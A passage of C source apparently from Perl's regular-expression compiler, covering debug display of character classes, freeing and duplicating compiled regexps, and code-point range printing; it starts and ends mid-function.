if (OP(o) == ANYOFL || OP(o) == ANYOFPOSIXL) {
if (ANYOFL_UTF8_LOCALE_REQD(flags)) {
sv_catpvs(sv, "{utf8-locale-reqd}");
}
if (flags & ANYOFL_FOLD) {
sv_catpvs(sv, "{i}");
}
}
/* If there is stuff outside the bitmap, get it */
if (ARG(o) != ANYOF_ONLY_HAS_BITMAP) {
(void) _get_regclass_nonbitmap_data(prog, o, FALSE,
&unresolved,
&only_utf8_locale_invlist,
&nonbitmap_invlist);
/* The non-bitmap data may contain stuff that could fit in the
* bitmap. This could come from a user-defined property being
* finally resolved when this call was done; or much more likely
* because there are matches that require UTF-8 to be valid, and so
* aren't in the bitmap. This is teased apart later */
_invlist_intersection(nonbitmap_invlist,
PL_InBitmap,
&bitmap_range_not_in_bitmap);
/* Leave just the things that don't fit into the bitmap */
_invlist_subtract(nonbitmap_invlist,
PL_InBitmap,
&nonbitmap_invlist);
}
/* Obey this flag to add all above-the-bitmap code points */
if (flags & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
nonbitmap_invlist = _add_range_to_invlist(nonbitmap_invlist,
NUM_ANYOF_CODE_POINTS,
UV_MAX);
}
/* Ready to start outputting. First, the initial left bracket */
Perl_sv_catpvf(aTHX_ sv, "[%s", PL_colors[0]);
if (OP(o) != ANYOFH) {
/* Then all the things that could fit in the bitmap */
do_sep = put_charclass_bitmap_innards(sv,
ANYOF_BITMAP(o),
bitmap_range_not_in_bitmap,
only_utf8_locale_invlist,
o,
/* Can't try inverting for a
* better display if there
* are things that haven't
* been resolved */
unresolved != NULL);
SvREFCNT_dec(bitmap_range_not_in_bitmap);
/* If there are user-defined properties which haven't been defined
* yet, output them. If the result is not to be inverted, it is
* clearest to output them in a separate [] from the bitmap range
* stuff. If the result is to be complemented, we have to show
* everything in one [], as the inversion applies to the whole
* thing. Use {braces} to separate them from anything in the
* bitmap and anything above the bitmap. */
if (unresolved) {
if (inverted) {
                if (! do_sep) {    /* If we didn't output anything in the
                                      bitmap */
sv_catpvs(sv, "^");
}
sv_catpvs(sv, "{");
}
else if (do_sep) {
Perl_sv_catpvf(aTHX_ sv,"%s][%s", PL_colors[1],
PL_colors[0]);
}
sv_catsv(sv, unresolved);
if (inverted) {
sv_catpvs(sv, "}");
}
do_sep = ! inverted;
}
}
/* And, finally, add the above-the-bitmap stuff */
if (nonbitmap_invlist && _invlist_len(nonbitmap_invlist)) {
SV* contents;
/* See if truncation size is overridden */
const STRLEN dump_len = (PL_dump_re_max_len > 256)
? PL_dump_re_max_len
: 256;
/* This is output in a separate [] */
if (do_sep) {
Perl_sv_catpvf(aTHX_ sv,"%s][%s", PL_colors[1], PL_colors[0]);
}
            /* And, for ease of understanding, it is shown in the
* uncomplemented form if possible. The one exception being if
* there are unresolved items, where the inversion has to be
* delayed until runtime */
if (inverted && ! unresolved) {
_invlist_invert(nonbitmap_invlist);
_invlist_subtract(nonbitmap_invlist, PL_InBitmap, &nonbitmap_invlist);
}
contents = invlist_contents(nonbitmap_invlist,
FALSE /* output suitable for catsv */
);
/* If the output is shorter than the permissible maximum, just do it. */
if (SvCUR(contents) <= dump_len) {
sv_catsv(sv, contents);
}
else {
const char * contents_string = SvPVX(contents);
STRLEN i = dump_len;
/* Otherwise, start at the permissible max and work back to the
* first break possibility */
while (i > 0 && contents_string[i] != ' ') {
i--;
}
if (i == 0) { /* Fail-safe. Use the max if we couldn't
find a legal break */
i = dump_len;
}
sv_catpvn(sv, contents_string, i);
sv_catpvs(sv, "...");
}
SvREFCNT_dec_NN(contents);
SvREFCNT_dec_NN(nonbitmap_invlist);
}
/* And finally the matching, closing ']' */
Perl_sv_catpvf(aTHX_ sv, "%s]", PL_colors[1]);
if (OP(o) == ANYOFH && FLAGS(o) != 0) {
Perl_sv_catpvf(aTHX_ sv, " (First UTF-8 byte=\\x%02x)", FLAGS(o));
}
SvREFCNT_dec(unresolved);
}
else if (k == ANYOFM) {
SV * cp_list = get_ANYOFM_contents(o);
Perl_sv_catpvf(aTHX_ sv, "[%s", PL_colors[0]);
if (OP(o) == NANYOFM) {
_invlist_invert(cp_list);
}
put_charclass_bitmap_innards(sv, NULL, cp_list, NULL, NULL, TRUE);
Perl_sv_catpvf(aTHX_ sv, "%s]", PL_colors[1]);
SvREFCNT_dec(cp_list);
}
else if (k == POSIXD || k == NPOSIXD) {
U8 index = FLAGS(o) * 2;
if (index < C_ARRAY_LENGTH(anyofs)) {
if (*anyofs[index] != '[') {
sv_catpvs(sv, "[");
}
sv_catpv(sv, anyofs[index]);
if (*anyofs[index] != '[') {
sv_catpvs(sv, "]");
}
}
else {
            Perl_sv_catpvf(aTHX_ sv, "[illegal type=%d]", index);
}
}
else if (k == BOUND || k == NBOUND) {
/* Must be synced with order of 'bound_type' in regcomp.h */
const char * const bounds[] = {
"", /* Traditional */
"{gcb}",
"{lb}",
"{sb}",
"{wb}"
};
assert(FLAGS(o) < C_ARRAY_LENGTH(bounds));
sv_catpv(sv, bounds[FLAGS(o)]);
}
else if (k == BRANCHJ && (OP(o) == UNLESSM || OP(o) == IFMATCH)) {
Perl_sv_catpvf(aTHX_ sv, "[%d", -(o->flags));
if (o->next_off) {
Perl_sv_catpvf(aTHX_ sv, "..-%d", o->flags - o->next_off);
}
Perl_sv_catpvf(aTHX_ sv, "]");
}
else if (OP(o) == SBOL)
Perl_sv_catpvf(aTHX_ sv, " /%s/", o->flags ? "\\A" : "^");
/* add on the verb argument if there is one */
if ( ( k == VERB || OP(o) == ACCEPT || OP(o) == OPFAIL ) && o->flags) {
if ( ARG(o) )
Perl_sv_catpvf(aTHX_ sv, ":%" SVf,
SVfARG((MUTABLE_SV(progi->data->data[ ARG( o ) ]))));
else
sv_catpvs(sv, ":NULL");
}
#else
PERL_UNUSED_CONTEXT;
PERL_UNUSED_ARG(sv);
PERL_UNUSED_ARG(o);
PERL_UNUSED_ARG(prog);
PERL_UNUSED_ARG(reginfo);
PERL_UNUSED_ARG(pRExC_state);
#endif /* DEBUGGING */
}
SV *
Perl_re_intuit_string(pTHX_ REGEXP * const r)
{ /* Assume that RE_INTUIT is set */
struct regexp *const prog = ReANY(r);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_RE_INTUIT_STRING;
PERL_UNUSED_CONTEXT;
DEBUG_COMPILE_r(
{
const char * const s = SvPV_nolen_const(RX_UTF8(r)
? prog->check_utf8 : prog->check_substr);
if (!PL_colorset) reginitcolors();
Perl_re_printf( aTHX_
"%sUsing REx %ssubstr:%s \"%s%.60s%s%s\"\n",
PL_colors[4],
RX_UTF8(r) ? "utf8 " : "",
PL_colors[5], PL_colors[0],
s,
PL_colors[1],
(strlen(s) > PL_dump_re_max_len ? "..." : ""));
} );
/* use UTF8 check substring if regexp pattern itself is in UTF8 */
return RX_UTF8(r) ? prog->check_utf8 : prog->check_substr;
}
/*
pregfree()
 handles refcounting and freeing the perl core regexp structure. When
 it is necessary to actually free the structure, the first thing it
 does is call the 'free' method of the regexp_engine associated with
 the regexp, allowing the handling of the void *pprivate member
 first. (This routine is not overridable by extensions, which is why
 the extension's free is called first.)
See regdupe and regdupe_internal if you change anything here.
*/
#ifndef PERL_IN_XSUB_RE
void
Perl_pregfree(pTHX_ REGEXP *r)
{
SvREFCNT_dec(r);
}
void
Perl_pregfree2(pTHX_ REGEXP *rx)
{
struct regexp *const r = ReANY(rx);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_PREGFREE2;
if (! r)
return;
if (r->mother_re) {
ReREFCNT_dec(r->mother_re);
} else {
CALLREGFREE_PVT(rx); /* free the private data */
SvREFCNT_dec(RXp_PAREN_NAMES(r));
}
if (r->substrs) {
int i;
for (i = 0; i < 2; i++) {
SvREFCNT_dec(r->substrs->data[i].substr);
SvREFCNT_dec(r->substrs->data[i].utf8_substr);
}
Safefree(r->substrs);
}
RX_MATCH_COPY_FREE(rx);
#ifdef PERL_ANY_COW
SvREFCNT_dec(r->saved_copy);
#endif
Safefree(r->offs);
SvREFCNT_dec(r->qr_anoncv);
if (r->recurse_locinput)
Safefree(r->recurse_locinput);
}
/* reg_temp_copy()
   Copy ssv to dsv, both of which should be of type SVt_REGEXP or SVt_PVLV,
   except that dsv will be created if NULL.
   This function is used in two main ways. First to implement
       $r = qr/..../; $s = $$r;
   Secondly, it is used as a hacky workaround to the structural issue of
   match results being stored in the regexp structure which is in turn
   stored in PL_curpm/PL_reg_curpm. The problem is that due to qr// the
   pattern could be PL_curpm in multiple contexts, and could require
   multiple result sets being associated with the pattern simultaneously,
   such as when doing a recursive match with (??{$qr}).
   The solution is to make a lightweight copy of the regexp structure
   when a qr// is returned from the code executed by (??{$qr}); this
   lightweight copy doesn't actually own any of its data except for
   the startp/end and the actual regexp structure itself.
*/
REGEXP *
Perl_reg_temp_copy(pTHX_ REGEXP *dsv, REGEXP *ssv)
{
struct regexp *drx;
struct regexp *const srx = ReANY(ssv);
const bool islv = dsv && SvTYPE(dsv) == SVt_PVLV;
PERL_ARGS_ASSERT_REG_TEMP_COPY;
if (!dsv)
dsv = (REGEXP*) newSV_type(SVt_REGEXP);
else {
assert(SvTYPE(dsv) == SVt_REGEXP || (SvTYPE(dsv) == SVt_PVLV));
/* our only valid caller, sv_setsv_flags(), should have done
* a SV_CHECK_THINKFIRST_COW_DROP() by now */
assert(!SvOOK(dsv));
assert(!SvIsCOW(dsv));
assert(!SvROK(dsv));
if (SvPVX_const(dsv)) {
if (SvLEN(dsv))
Safefree(SvPVX(dsv));
SvPVX(dsv) = NULL;
}
SvLEN_set(dsv, 0);
SvCUR_set(dsv, 0);
SvOK_off((SV *)dsv);
if (islv) {
/* For PVLVs, the head (sv_any) points to an XPVLV, while
* the LV's xpvlenu_rx will point to a regexp body, which
* we allocate here */
REGEXP *temp = (REGEXP *)newSV_type(SVt_REGEXP);
assert(!SvPVX(dsv));
((XPV*)SvANY(dsv))->xpv_len_u.xpvlenu_rx = temp->sv_any;
temp->sv_any = NULL;
SvFLAGS(temp) = (SvFLAGS(temp) & ~SVTYPEMASK) | SVt_NULL;
SvREFCNT_dec_NN(temp);
/* SvCUR still resides in the xpvlv struct, so the regexp copy-
ing below will not set it. */
SvCUR_set(dsv, SvCUR(ssv));
}
}
/* This ensures that SvTHINKFIRST(sv) is true, and hence that
sv_force_normal(sv) is called. */
SvFAKE_on(dsv);
drx = ReANY(dsv);
SvFLAGS(dsv) |= SvFLAGS(ssv) & (SVf_POK|SVp_POK|SVf_UTF8);
SvPV_set(dsv, RX_WRAPPED(ssv));
/* We share the same string buffer as the original regexp, on which we
hold a reference count, incremented when mother_re is set below.
The string pointer is copied here, being part of the regexp struct.
*/
memcpy(&(drx->xpv_cur), &(srx->xpv_cur),
sizeof(regexp) - STRUCT_OFFSET(regexp, xpv_cur));
if (!islv)
SvLEN_set(dsv, 0);
if (srx->offs) {
const I32 npar = srx->nparens+1;
Newx(drx->offs, npar, regexp_paren_pair);
Copy(srx->offs, drx->offs, npar, regexp_paren_pair);
}
if (srx->substrs) {
int i;
Newx(drx->substrs, 1, struct reg_substr_data);
StructCopy(srx->substrs, drx->substrs, struct reg_substr_data);
for (i = 0; i < 2; i++) {
SvREFCNT_inc_void(drx->substrs->data[i].substr);
SvREFCNT_inc_void(drx->substrs->data[i].utf8_substr);
}
/* check_substr and check_utf8, if non-NULL, point to either their
anchored or float namesakes, and don't hold a second reference. */
}
RX_MATCH_COPIED_off(dsv);
#ifdef PERL_ANY_COW
drx->saved_copy = NULL;
#endif
drx->mother_re = ReREFCNT_inc(srx->mother_re ? srx->mother_re : ssv);
SvREFCNT_inc_void(drx->qr_anoncv);
if (srx->recurse_locinput)
Newx(drx->recurse_locinput, srx->nparens + 1, char *);
return dsv;
}
#endif
/* regfree_internal()
Free the private data in a regexp. This is overloadable by
   extensions. Perl takes care of the regexp structure in pregfree();
   this covers the *pprivate pointer, which technically perl doesn't
   know about, though of course we have to handle the
   regexp_internal structure when no extension is in use.
Note this is called before freeing anything in the regexp
structure.
*/
void
Perl_regfree_internal(pTHX_ REGEXP * const rx)
{
struct regexp *const r = ReANY(rx);
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGFREE_INTERNAL;
if (! ri) {
return;
}
DEBUG_COMPILE_r({
if (!PL_colorset)
reginitcolors();
{
SV *dsv= sv_newmortal();
RE_PV_QUOTED_DECL(s, RX_UTF8(rx),
dsv, RX_PRECOMP(rx), RX_PRELEN(rx), PL_dump_re_max_len);
Perl_re_printf( aTHX_ "%sFreeing REx:%s %s\n",
PL_colors[4], PL_colors[5], s);
}
});
#ifdef RE_TRACK_PATTERN_OFFSETS
if (ri->u.offsets)
Safefree(ri->u.offsets); /* 20010421 MJD */
#endif
if (ri->code_blocks)
S_free_codeblocks(aTHX_ ri->code_blocks);
if (ri->data) {
int n = ri->data->count;
while (--n >= 0) {
/* If you add a ->what type here, update the comment in regcomp.h */
switch (ri->data->what[n]) {
case 'a':
case 'r':
case 's':
case 'S':
case 'u':
SvREFCNT_dec(MUTABLE_SV(ri->data->data[n]));
break;
case 'f':
Safefree(ri->data->data[n]);
break;
case 'l':
case 'L':
break;
case 'T':
            { /* Aho-Corasick add-on structure for a trie node.
Used in stclass optimization only */
U32 refcount;
reg_ac_data *aho=(reg_ac_data*)ri->data->data[n];
#ifdef USE_ITHREADS
dVAR;
#endif
OP_REFCNT_LOCK;
refcount = --aho->refcount;
OP_REFCNT_UNLOCK;
if ( !refcount ) {
PerlMemShared_free(aho->states);
PerlMemShared_free(aho->fail);
/* do this last!!!! */
PerlMemShared_free(ri->data->data[n]);
/* we should only ever get called once, so
* assert as much, and also guard the free
* which /might/ happen twice. At the least
                     * it will make code analyzers happy and it
* doesn't cost much. - Yves */
assert(ri->regstclass);
if (ri->regstclass) {
PerlMemShared_free(ri->regstclass);
ri->regstclass = 0;
}
}
}
break;
case 't':
{
/* trie structure. */
U32 refcount;
reg_trie_data *trie=(reg_trie_data*)ri->data->data[n];
#ifdef USE_ITHREADS
dVAR;
#endif
OP_REFCNT_LOCK;
refcount = --trie->refcount;
OP_REFCNT_UNLOCK;
if ( !refcount ) {
PerlMemShared_free(trie->charmap);
PerlMemShared_free(trie->states);
PerlMemShared_free(trie->trans);
if (trie->bitmap)
PerlMemShared_free(trie->bitmap);
if (trie->jump)
PerlMemShared_free(trie->jump);
PerlMemShared_free(trie->wordinfo);
/* do this last!!!! */
PerlMemShared_free(ri->data->data[n]);
}
}
break;
default:
Perl_croak(aTHX_ "panic: regfree data code '%c'",
ri->data->what[n]);
}
}
Safefree(ri->data->what);
Safefree(ri->data);
}
Safefree(ri);
}
#define av_dup_inc(s, t) MUTABLE_AV(sv_dup_inc((const SV *)s, t))
#define hv_dup_inc(s, t) MUTABLE_HV(sv_dup_inc((const SV *)s, t))
#define SAVEPVN(p, n) ((p) ? savepvn(p, n) : NULL)
/*
re_dup_guts - duplicate a regexp.
This routine is expected to clone a given regexp structure. It is only
compiled under USE_ITHREADS.
After all of the core data stored in struct regexp is duplicated
the regexp_engine.dupe method is used to copy any private data
stored in the *pprivate pointer. This allows extensions to handle
   any duplication they need to do.
See pregfree() and regfree_internal() if you change anything here.
*/
#if defined(USE_ITHREADS)
#ifndef PERL_IN_XSUB_RE
void
Perl_re_dup_guts(pTHX_ const REGEXP *sstr, REGEXP *dstr, CLONE_PARAMS *param)
{
dVAR;
I32 npar;
const struct regexp *r = ReANY(sstr);
struct regexp *ret = ReANY(dstr);
PERL_ARGS_ASSERT_RE_DUP_GUTS;
npar = r->nparens+1;
Newx(ret->offs, npar, regexp_paren_pair);
Copy(r->offs, ret->offs, npar, regexp_paren_pair);
if (ret->substrs) {
/* Do it this way to avoid reading from *r after the StructCopy().
That way, if any of the sv_dup_inc()s dislodge *r from the L1
cache, it doesn't matter. */
int i;
const bool anchored = r->check_substr
? r->check_substr == r->substrs->data[0].substr
: r->check_utf8 == r->substrs->data[0].utf8_substr;
Newx(ret->substrs, 1, struct reg_substr_data);
StructCopy(r->substrs, ret->substrs, struct reg_substr_data);
for (i = 0; i < 2; i++) {
ret->substrs->data[i].substr =
sv_dup_inc(ret->substrs->data[i].substr, param);
ret->substrs->data[i].utf8_substr =
sv_dup_inc(ret->substrs->data[i].utf8_substr, param);
}
/* check_substr and check_utf8, if non-NULL, point to either their
anchored or float namesakes, and don't hold a second reference. */
if (ret->check_substr) {
if (anchored) {
assert(r->check_utf8 == r->substrs->data[0].utf8_substr);
ret->check_substr = ret->substrs->data[0].substr;
ret->check_utf8 = ret->substrs->data[0].utf8_substr;
} else {
assert(r->check_substr == r->substrs->data[1].substr);
assert(r->check_utf8 == r->substrs->data[1].utf8_substr);
ret->check_substr = ret->substrs->data[1].substr;
ret->check_utf8 = ret->substrs->data[1].utf8_substr;
}
} else if (ret->check_utf8) {
if (anchored) {
ret->check_utf8 = ret->substrs->data[0].utf8_substr;
} else {
ret->check_utf8 = ret->substrs->data[1].utf8_substr;
}
}
}
RXp_PAREN_NAMES(ret) = hv_dup_inc(RXp_PAREN_NAMES(ret), param);
ret->qr_anoncv = MUTABLE_CV(sv_dup_inc((const SV *)ret->qr_anoncv, param));
if (r->recurse_locinput)
Newx(ret->recurse_locinput, r->nparens + 1, char *);
if (ret->pprivate)
RXi_SET(ret, CALLREGDUPE_PVT(dstr, param));
if (RX_MATCH_COPIED(dstr))
ret->subbeg = SAVEPVN(ret->subbeg, ret->sublen);
else
ret->subbeg = NULL;
#ifdef PERL_ANY_COW
ret->saved_copy = NULL;
#endif
    /* Whether or not mother_re is set, we need to copy the string.  We
cannot refrain from copying it when the storage points directly to
our mother regexp, because that's
1: a buffer in a different thread
2: something we no longer hold a reference on
so we need to copy it locally. */
RX_WRAPPED(dstr) = SAVEPVN(RX_WRAPPED_const(sstr), SvCUR(sstr)+1);
/* set malloced length to a non-zero value so it will be freed
* (otherwise in combination with SVf_FAKE it looks like an alien
* buffer). It doesn't have to be the actual malloced size, since it
* should never be grown */
SvLEN_set(dstr, SvCUR(sstr)+1);
ret->mother_re = NULL;
}
#endif /* PERL_IN_XSUB_RE */
/*
regdupe_internal()
This is the internal complement to regdupe() which is used to copy
the structure pointed to by the *pprivate pointer in the regexp.
This is the core version of the extension overridable cloning hook.
The regexp structure being duplicated will be copied by perl prior
to this and will be provided as the regexp *r argument, however
   with the /old/ structure's pprivate pointer value. Thus this routine
may override any copying normally done by perl.
It returns a pointer to the new regexp_internal structure.
*/
void *
Perl_regdupe_internal(pTHX_ REGEXP * const rx, CLONE_PARAMS *param)
{
dVAR;
struct regexp *const r = ReANY(rx);
regexp_internal *reti;
int len;
RXi_GET_DECL(r, ri);
PERL_ARGS_ASSERT_REGDUPE_INTERNAL;
len = ProgLen(ri);
Newxc(reti, sizeof(regexp_internal) + len*sizeof(regnode),
char, regexp_internal);
Copy(ri->program, reti->program, len+1, regnode);
if (ri->code_blocks) {
int n;
Newx(reti->code_blocks, 1, struct reg_code_blocks);
Newx(reti->code_blocks->cb, ri->code_blocks->count,
struct reg_code_block);
Copy(ri->code_blocks->cb, reti->code_blocks->cb,
ri->code_blocks->count, struct reg_code_block);
for (n = 0; n < ri->code_blocks->count; n++)
reti->code_blocks->cb[n].src_regex = (REGEXP*)
sv_dup_inc((SV*)(ri->code_blocks->cb[n].src_regex), param);
reti->code_blocks->count = ri->code_blocks->count;
reti->code_blocks->refcnt = 1;
}
else
reti->code_blocks = NULL;
reti->regstclass = NULL;
if (ri->data) {
struct reg_data *d;
const int count = ri->data->count;
int i;
Newxc(d, sizeof(struct reg_data) + count*sizeof(void *),
char, struct reg_data);
Newx(d->what, count, U8);
d->count = count;
for (i = 0; i < count; i++) {
d->what[i] = ri->data->what[i];
switch (d->what[i]) {
/* see also regcomp.h and regfree_internal() */
case 'a': /* actually an AV, but the dup function is identical.
values seem to be "plain sv's" generally. */
case 'r': /* a compiled regex (but still just another SV) */
case 's': /* an RV (currently only used for an RV to an AV by the ANYOF code)
this use case should go away, the code could have used
'a' instead - see S_set_ANYOF_arg() for array contents. */
case 'S': /* actually an SV, but the dup function is identical. */
case 'u': /* actually an HV, but the dup function is identical.
values are "plain sv's" */
d->data[i] = sv_dup_inc((const SV *)ri->data->data[i], param);
break;
case 'f':
/* Synthetic Start Class - "Fake" charclass we generate to optimize
* patterns which could start with several different things. Pre-TRIE
* this was more important than it is now, however this still helps
* in some places, for instance /x?a+/ might produce a SSC equivalent
* to [xa]. This is used by Perl_re_intuit_start() and S_find_byclass()
* in regexec.c
*/
/* This is cheating. */
Newx(d->data[i], 1, regnode_ssc);
StructCopy(ri->data->data[i], d->data[i], regnode_ssc);
reti->regstclass = (regnode*)d->data[i];
break;
case 'T':
/* AHO-CORASICK fail table */
/* Trie stclasses are readonly and can thus be shared
* without duplication. We free the stclass in pregfree
* when the corresponding reg_ac_data struct is freed.
*/
reti->regstclass= ri->regstclass;
/* FALLTHROUGH */
case 't':
/* TRIE transition table */
OP_REFCNT_LOCK;
((reg_trie_data*)ri->data->data[i])->refcount++;
OP_REFCNT_UNLOCK;
/* FALLTHROUGH */
case 'l': /* (?{...}) or (??{ ... }) code (cb->block) */
case 'L': /* same when RExC_pm_flags & PMf_HAS_CV and code
is not from another regexp */
d->data[i] = ri->data->data[i];
break;
default:
Perl_croak(aTHX_ "panic: re_dup_guts unknown data code '%c'",
ri->data->what[i]);
}
}
reti->data = d;
}
else
reti->data = NULL;
reti->name_list_idx = ri->name_list_idx;
#ifdef RE_TRACK_PATTERN_OFFSETS
if (ri->u.offsets) {
Newx(reti->u.offsets, 2*len+1, U32);
Copy(ri->u.offsets, reti->u.offsets, 2*len+1, U32);
}
#else
SetProgLen(reti, len);
#endif
return (void*)reti;
}
#endif /* USE_ITHREADS */
#ifndef PERL_IN_XSUB_RE
/*
- regnext - dig the "next" pointer out of a node
*/
regnode *
Perl_regnext(pTHX_ regnode *p)
{
I32 offset;
if (!p)
return(NULL);
if (OP(p) > REGNODE_MAX) { /* regnode.type is unsigned */
Perl_croak(aTHX_ "Corrupted regexp opcode %d > %d",
(int)OP(p), (int)REGNODE_MAX);
}
offset = (reg_off_by_arg[OP(p)] ? ARG(p) : NEXT_OFF(p));
if (offset == 0)
return(NULL);
return(p+offset);
}
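/* Illustrative sketch (hypothetical program layout): for a node at
 * program + 3 whose stored next offset is 4, regnext() returns program + 7;
 * a stored offset of 0 yields NULL, which is what terminates chain walks
 * such as the one in regtail().  Whether the offset lives in ARG() or
 * NEXT_OFF() depends on reg_off_by_arg[] for the node's opcode. */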
#endif
STATIC void
S_re_croak2(pTHX_ bool utf8, const char* pat1, const char* pat2,...)
{
va_list args;
STRLEN l1 = strlen(pat1);
STRLEN l2 = strlen(pat2);
char buf[512];
SV *msv;
const char *message;
PERL_ARGS_ASSERT_RE_CROAK2;
if (l1 > 510)
l1 = 510;
if (l1 + l2 > 510)
l2 = 510 - l1;
Copy(pat1, buf, l1 , char);
Copy(pat2, buf + l1, l2 , char);
buf[l1 + l2] = '\n';
buf[l1 + l2 + 1] = '\0';
va_start(args, pat2);
msv = vmess(buf, &args);
va_end(args);
message = SvPV_const(msv, l1);
if (l1 > 512)
l1 = 512;
Copy(message, buf, l1 , char);
/* l1-1 to avoid \n */
Perl_croak(aTHX_ "%" UTF8f, UTF8fARG(utf8, l1-1, buf));
}
/* XXX Here's a total kludge. But we need to re-enter for swash routines. */
#ifndef PERL_IN_XSUB_RE
void
Perl_save_re_context(pTHX)
{
I32 nparens = -1;
I32 i;
/* Save $1..$n (#18107: UTF-8 s/(\w+)/uc($1)/e); AMS 20021106. */
if (PL_curpm) {
const REGEXP * const rx = PM_GETRE(PL_curpm);
if (rx)
nparens = RX_NPARENS(rx);
}
/* RT #124109. This is a complete hack; in the SWASHNEW case we know
* that PL_curpm will be null, but that utf8.pm and the modules it
* loads will only use $1..$3.
* The t/porting/re_context.t test file checks this assumption.
*/
if (nparens == -1)
nparens = 3;
for (i = 1; i <= nparens; i++) {
char digits[TYPE_CHARS(long)];
const STRLEN len = my_snprintf(digits, sizeof(digits),
"%lu", (long)i);
GV *const *const gvp
= (GV**)hv_fetch(PL_defstash, digits, len, 0);
if (gvp) {
GV * const gv = *gvp;
if (SvTYPE(gv) == SVt_PVGV && GvSV(gv))
save_scalar(gv);
}
}
}
#endif
#ifdef DEBUGGING
STATIC void
S_put_code_point(pTHX_ SV *sv, UV c)
{
PERL_ARGS_ASSERT_PUT_CODE_POINT;
if (c > 255) {
Perl_sv_catpvf(aTHX_ sv, "\\x{%04" UVXf "}", c);
}
else if (isPRINT(c)) {
const char string = (char) c;
/* We use {phrase} as metanotation in the class, so also escape literal
* braces */
if (isBACKSLASHED_PUNCT(c) || c == '{' || c == '}')
sv_catpvs(sv, "\\");
sv_catpvn(sv, &string, 1);
}
else if (isMNEMONIC_CNTRL(c)) {
Perl_sv_catpvf(aTHX_ sv, "%s", cntrl_to_mnemonic((U8) c));
}
else {
Perl_sv_catpvf(aTHX_ sv, "\\x%02X", (U8) c);
}
}
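/* Example renderings (assuming an ASCII platform): put_code_point(sv, 'a')
 * appends "a"; '{' appends "\{", since braces are used as metanotation
 * here; the tab character appends its mnemonic "\t"; 0x1F appends "\x1F";
 * and 0x130 appends "\x{0130}". */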
#define MAX_PRINT_A MAX_PRINT_A_FOR_USE_ONLY_BY_REGCOMP_DOT_C
STATIC void
S_put_range(pTHX_ SV *sv, UV start, const UV end, const bool allow_literals)
{
/* Appends to 'sv' a displayable version of the range of code points from
* 'start' to 'end'. Mnemonics (like '\r') are used for the few controls
* that have them, when they occur at the beginning or end of the range.
* It uses hex to output the remaining code points, unless 'allow_literals'
* is true, in which case the printable ASCII ones are output as-is (though
* some of these will be escaped by put_code_point()).
*
* NOTE: This is designed only for printing ranges of code points that fit
* inside an ANYOF bitmap. Higher code points are simply suppressed
*/
const unsigned int min_range_count = 3;
assert(start <= end);
PERL_ARGS_ASSERT_PUT_RANGE;
while (start <= end) {
UV this_end;
const char * format;
if (end - start < min_range_count) {
/* Output chars individually when they occur in short ranges */
for (; start <= end; start++) {
put_code_point(sv, start);
}
break;
}
/* If permitted by the input options, and there is a possibility that
* this range contains a printable literal, look to see if there is
* one. */
if (allow_literals && start <= MAX_PRINT_A) {
/* If the character at the beginning of the range isn't an ASCII
* printable, effectively split the range into two parts:
* 1) the portion before the first such printable,
* 2) the rest
* and output them separately. */
if (! isPRINT_A(start)) {
UV temp_end = start + 1;
/* There is no point looking beyond the final possible
                 * printable, which is MAX_PRINT_A */
UV max = MIN(end, MAX_PRINT_A);
while (temp_end <= max && ! isPRINT_A(temp_end)) {
temp_end++;
}
/* Here, temp_end points to one beyond the first printable if
* found, or to one beyond 'max' if not. If none found, make
* sure that we use the entire range */
if (temp_end > MAX_PRINT_A) {
temp_end = end + 1;
}
/* Output the first part of the split range: the part that
* doesn't have printables, with the parameter set to not look
* for literals (otherwise we would infinitely recurse) */
put_range(sv, start, temp_end - 1, FALSE);
/* The 2nd part of the range (if any) starts here. */
start = temp_end;
/* We do a continue, instead of dropping down, because even if
* the 2nd part is non-empty, it could be so short that we want
* to output it as individual characters, as tested for at the
* top of this loop. */
continue;
}
/* Here, 'start' is a printable ASCII. If it is an alphanumeric,
* output a sub-range of just the digits or letters, then process
* the remaining portion as usual. */
if (isALPHANUMERIC_A(start)) {
UV mask = (isDIGIT_A(start))
? _CC_DIGIT
: isUPPER_A(start)
? _CC_UPPER
: _CC_LOWER;
UV temp_end = start + 1;
/* Find the end of the sub-range that includes just the
* characters in the same class as the first character in it */
while (temp_end <= end && _generic_isCC_A(temp_end, mask)) {
temp_end++;
}
temp_end--;
/* For short ranges, don't duplicate the code above to output
* them; just call recursively */
if (temp_end - start < min_range_count) {
put_range(sv, start, temp_end, FALSE);
}
else { /* Output as a range */
put_code_point(sv, start);
sv_catpvs(sv, "-");
put_code_point(sv, temp_end);
}
start = temp_end + 1;
continue;
}
/* We output any other printables as individual characters */
if (isPUNCT_A(start) || isSPACE_A(start)) {
while (start <= end && (isPUNCT_A(start)
|| isSPACE_A(start)))
{
put_code_point(sv, start);
start++;
}
continue;
}
} /* End of looking for literals */
        /* Here, the code points are not to be output as literals.  Some control characters have
* mnemonic names. Split off any of those at the beginning and end of
* the range to print mnemonically. It isn't possible for many of
* these to be in a row, so this won't overwhelm with output */
if ( start <= end
&& (isMNEMONIC_CNTRL(start) || isMNEMONIC_CNTRL(end)))
{
while (isMNEMONIC_CNTRL(start) && start <= end) {
put_code_point(sv, start);
start++;
}
/* If this didn't take care of the whole range ... */
if (start <= end) {
                /* Look backwards from the end to find the final non-mnemonic
                 * control */
UV temp_end = end;
while (isMNEMONIC_CNTRL(temp_end)) {
temp_end--;
}
/* And separately output the interior range that doesn't start
* or end with mnemonics */
put_range(sv, start, temp_end, FALSE);
/* Then output the mnemonic trailing controls */
start = temp_end + 1;
while (start <= end) {
put_code_point(sv, start);
start++;
}
break;
}
}
/* As a final resort, output the range or subrange as hex. */
this_end = (end < NUM_ANYOF_CODE_POINTS)
? end
: NUM_ANYOF_CODE_POINTS - 1;
#if NUM_ANYOF_CODE_POINTS > 256
format = (this_end < 256)
? "\\x%02" UVXf "-\\x%02" UVXf
: "\\x{%04" UVXf "}-\\x{%04" UVXf "}";
#else
format = "\\x%02" UVXf "-\\x%02" UVXf;
#endif
GCC_DIAG_IGNORE_STMT(-Wformat-nonliteral);
Perl_sv_catpvf(aTHX_ sv, format, start, this_end);
GCC_DIAG_RESTORE_STMT;
break;
}
}
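/* Illustrative sketch (hypothetical inputs): put_range(sv, 'a', 'z', TRUE)
 * appends "a-z"; put_range(sv, 0x00, 0x06, FALSE) appends the hex range
 * "\x00-\x06"; and a span of at most three code points, such as
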